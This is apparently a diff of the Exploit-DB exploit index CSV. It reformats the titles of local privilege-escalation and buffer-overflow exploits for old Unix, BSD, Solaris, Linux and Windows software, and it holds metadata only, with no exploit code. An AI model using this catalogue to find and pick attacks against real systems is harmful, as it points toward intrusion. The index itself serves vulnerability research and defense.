 16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0
-16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0
+16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit",2011-02-06,kingcope,freebsd,local,0
 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
 16138,platforms/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0
@ -7334,7 +7335,7 @@ id,file,description,date,author,platform,type,port
 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0
-19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0
+19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - 'sdtcm_convert' Exploit",1998-10-23,UNYUN,solaris,local,0
 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0
 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0
@ -7358,10 +7359,10 @@ id,file,description,date,author,platform,type,port
 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0
 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0
 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0
-19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0
+19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)",1997-08-25,bloodmask,unix,local,0
-19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0
+19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)",1997-08-25,jGgM,unix,local,0
-19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0
+19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3)",1997-08-25,jGgM,unix,local,0
-19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0
+19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit",1996-12-04,"Roger Espel Llima",unix,local,0
 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0
 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0
 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0
@ -7391,7 +7392,7 @@ id,file,description,date,author,platform,type,port
 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0
 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0
 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0
-19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
+19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0
 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0
 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0
@ -7454,8 +7455,8 @@ id,file,description,date,author,platform,type,port
 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0
 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0
 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0
-19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0
+19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0
-19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0
+19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0
 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0
 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0
 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0
@ -7510,13 +7511,13 @@ id,file,description,date,author,platform,type,port
 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0
 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0
 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0
-19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0
+19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0
-19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0
+19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0
 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0
 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0
 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0
-19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0
+19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0
 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0
 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0
 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0
@ -7535,11 +7536,11 @@ id,file,description,date,author,platform,type,port
 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0
 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0
 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0
-19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
-19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0
+19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0
-19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0
+19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0
-19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
-19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0
 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0
@ -7575,7 +7576,7 @@ id,file,description,date,author,platform,type,port
 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0
 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit",2000-02-15,"Shawn Bracken",sco,local,0
 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0
-19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0
+19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit",2000-02-19,anonymous,freebsd,local,0
 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink Exploit",2000-02-21,sp00n,solaris,local,0
 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0
 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0
@ -7640,8 +7641,8 @@ id,file,description,date,author,platform,type,port
 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0
 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0
 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0
-19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
+19991,platforms/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
-19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
+19992,platforms/linux/local/19992.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
@ -7705,7 +7706,7 @@ id,file,description,date,author,platform,type,port
 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0
 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0
 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0
-20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0
+20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,openbsd,local,0
 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0
@ -7721,7 +7722,7 @@ id,file,description,date,author,platform,type,port
 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0
 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0
 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual EscribÃ¡",linux,local,0
-20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0
+20316,platforms/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0
 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0
 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0
 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File Exploit",2000-10-20,"Kyong-won Cho",hp-ux,local,0
@ -7729,7 +7730,7 @@ id,file,description,date,author,platform,type,port
 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
-20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0
+20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,freebsd,local,0
 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0
@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port
 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0
 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0
 21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0
-21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0
+21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0
 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0
 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0
 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0
@ -8059,8 +8060,8 @@ id,file,description,date,author,platform,type,port
 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
-22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
+22332,platforms/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
-22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
+22331,platforms/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
 22321,platforms/linux/local/22321.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local,0
 22322,platforms/linux/local/22322.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3)",2003-03-03,omega,linux,local,0
@ -8216,7 +8217,7 @@ id,file,description,date,author,platform,type,port
 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0
-23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
+23655,platforms/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0
 23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0
 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
@ -8318,7 +8319,7 @@ id,file,description,date,author,platform,type,port
 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0
 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0
 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local,0
-25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
+25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
 40394,platforms/linux/local/40394.rb,"Docker Daemon - Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local,0
 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,windows,local,0
@ -8352,7 +8353,7 @@ id,file,description,date,author,platform,type,port
 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0
 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0
 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0
-26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation",2013-06-21,Hunger,freebsd,local,0
+26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation",2013-06-21,Hunger,freebsd,local,0
 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
@ -8379,7 +8380,7 @@ id,file,description,date,author,platform,type,port
 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0
 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0
-40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
+40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0
 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0
@ -8440,7 +8441,7 @@ id,file,description,date,author,platform,type,port
 40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
